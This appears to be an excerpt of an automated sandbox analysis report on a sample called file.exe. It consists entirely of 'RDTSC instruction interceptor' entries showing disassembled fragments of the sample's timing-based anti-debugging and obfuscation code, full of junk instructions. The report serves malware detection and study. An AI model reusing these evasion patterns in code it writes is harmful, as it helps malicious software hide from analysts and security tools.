                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66847 second address: D66866 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1674F90E16h 0x00000008 jmp 00007F1674F90E25h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66866 second address: D6686E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69578 second address: D695B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1674F90E1Eh 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E1Bh 0x00000014 jnl 00007F1674F90E16h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1674F90E1Fh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D695B3 second address: D695B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E299 second address: D6E2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a jl 00007F1674F90E16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E2AB second address: D6E2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72120 second address: D72136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Bh 0x00000009 jc 00007F1674F90E16h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72136 second address: D7213D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7213D second address: D7216C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E28h 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jnp 00007F1674F90E24h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7216C second address: D72170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71515 second address: D71519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71519 second address: D71537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71537 second address: D7154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E1Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7154D second address: D71555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71555 second address: D7155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71828 second address: D7183B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jc 00007F1675279DA6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76A3B second address: D76A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76A41 second address: D76A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76A45 second address: D76A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F1674F90E23h 0x00000014 jmp 00007F1674F90E1Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76BD4 second address: D76BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76BD9 second address: D76BF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F1674F90E1Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76D49 second address: D76D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F1675279DA6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F1675279DA6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76D5F second address: D76D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76D63 second address: D76D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F1675279DACh 0x00000012 jo 00007F1675279DA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76D7B second address: D76D80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76D80 second address: D76D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c ja 00007F1675279DA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26DC5 second address: D26E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F1674F90E18h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 adc edx, 27F37600h 0x0000002c mov edx, dword ptr [ebp+122D3200h] 0x00000032 mov edi, 4AE75881h 0x00000037 mov ebx, dword ptr [ebp+12487FDFh] 0x0000003d mov dl, ah 0x0000003f add eax, ebx 0x00000041 push esi 0x00000042 cld 0x00000043 pop ecx 0x00000044 movsx ecx, si 0x00000047 nop 0x00000048 jne 00007F1674F90E2Eh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jnl 00007F1674F90E25h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26E4F second address: D26ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1675279DA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F1675279DA8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 clc 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F1675279DA8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 call 00007F1675279DAEh 0x0000004b pop edx 0x0000004c mov cx, di 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1675279DB7h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26ECE second address: D26ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77A4E second address: D77A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D35D second address: D7D36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F1674F90E16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D36D second address: D7D371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D371 second address: D7D38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D92A second address: D7D934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1675279DA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D934 second address: D7D93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DEF5 second address: D7DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DEFD second address: D7DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DF03 second address: D7DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DF0A second address: D7DF11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DF11 second address: D7DF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jbe 00007F1675279DA6h 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E575 second address: D7E57C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E57C second address: D7E59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E59F second address: D7E5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CA6 second address: D84CB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jng 00007F1675279DA6h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CB6 second address: D84CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CBC second address: D84CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CC2 second address: D84CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CC6 second address: D84CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DB4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8444 second address: CD844C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD844C second address: CD8454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87E8B second address: D87E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87E96 second address: D87E9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87E9B second address: D87EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1674F90E16h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88007 second address: D8800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88152 second address: D88156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88156 second address: D8815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8815A second address: D8816D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8816D second address: D88173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88173 second address: D88177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D882CB second address: D882CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D882CF second address: D882F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8849F second address: D884C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1675279DB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D884C3 second address: D884C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88623 second address: D8862E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8862E second address: D88633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88633 second address: D88639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88639 second address: D8863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8863F second address: D8864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8864B second address: D88664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F1674F90E16h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push edi 0x00000010 jno 00007F1674F90E16h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88664 second address: D88674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9199D second address: D919A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D919A3 second address: D919A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D919A9 second address: D919B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9204D second address: D9207E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1675279DB2h 0x00000010 pop eax 0x00000011 jno 00007F1675279DA8h 0x00000017 popad 0x00000018 jp 00007F1675279DC8h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9207E second address: D92082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92082 second address: D9208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9208C second address: D92090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92090 second address: D92094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B2 second address: D921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B8 second address: D921D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D925E5 second address: D925F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D925F7 second address: D9262E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 jo 00007F1675279DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F1675279DADh 0x0000001c popad 0x0000001d pushad 0x0000001e jbe 00007F1675279DA6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9262E second address: D92645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E1Ch 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92645 second address: D9264B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9264B second address: D9265A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92E82 second address: D92ECC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DB1h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 jo 00007F1675279DA6h 0x0000001e jmp 00007F1675279DB1h 0x00000023 jmp 00007F1675279DADh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914CC second address: D914D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914D0 second address: D914D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914D6 second address: D914DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96CBC second address: D96CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC37 second address: D9DC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC3B second address: D9DC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC3F second address: D9DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1674F90E22h 0x00000012 jg 00007F1674F90E16h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC72 second address: D9DC7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC7D second address: D9DC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8245 second address: DA8263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB4h 0x00000009 jne 00007F1675279DA6h 0x0000000f rdtsc
